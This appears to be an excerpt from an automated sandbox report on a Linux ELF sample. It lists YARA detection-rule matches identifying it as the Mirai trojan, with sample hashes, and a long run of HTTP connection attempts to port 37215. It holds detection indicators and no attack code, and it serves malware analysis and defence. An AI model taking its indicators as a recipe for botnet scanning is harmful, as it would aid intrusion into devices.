          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: classification engineClassification label: mal100.troj.linELF@0/0@25/0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 46464 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48344 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59634 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49108 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43964 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40266 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39598 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41272 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60072 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52016 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38152 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37384 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53726 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46368 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42846 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48340 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35196 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50946 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59700 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38762 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57020 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39612 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45280 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43080 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45944 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38496 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34966 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57306 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52456 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55288 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38648 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34620 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42426 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44818 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37894 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36916 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36916 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43294 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45290 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33060 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33942 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58152 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39884 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58952 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45240 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60102 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48012 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45350 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54240 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56596 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60342 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53578 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60600 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36858 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47154 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47124 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48018 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54492 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40154 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44558 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46650 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43598 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38652 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54740 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57642 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48160 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39688 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34968 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52676 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59790 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44028 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57156 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52196 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56794 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48788 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33932 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55200 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53834 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60632 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57582 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51124 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41294 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33736 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56998 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44704 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50348 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37932 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36220 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44964 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38904 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60496 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33066 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40660 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43416 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41204 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34792 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55072 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56114 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46838 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39500 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35572 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42354 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41526 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59508 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42830 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39488 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55928 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60622 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45232 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48128 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54046 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47308 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34272 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49344 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40024 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53658 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33738 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47028 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38580 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54314 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42982 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37306 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56174 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43146 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55624 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37086 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57502 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52170 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43732 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38872 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60916 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39026 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49436 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36198 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60666 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48000 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59208 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38658 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37686 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56278 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33272 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36828 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41446 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58186 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34826 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44836 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55434 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58714 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57968 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40238 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54128 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49326 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37062 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48416 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45440 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57092 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33546 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55924 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52496 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57354 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39772 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34562 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43282 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59372 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42688 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42722 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48390 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53016 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56304 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51504 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50596 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48210 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60694 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34210 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41884 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39294 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41356 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39072 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59938 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48600 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35234 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32916 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53682 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59490 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56538 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46498 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36666 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51450 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35442 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54606 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43204 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57818 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38792 -> 37215
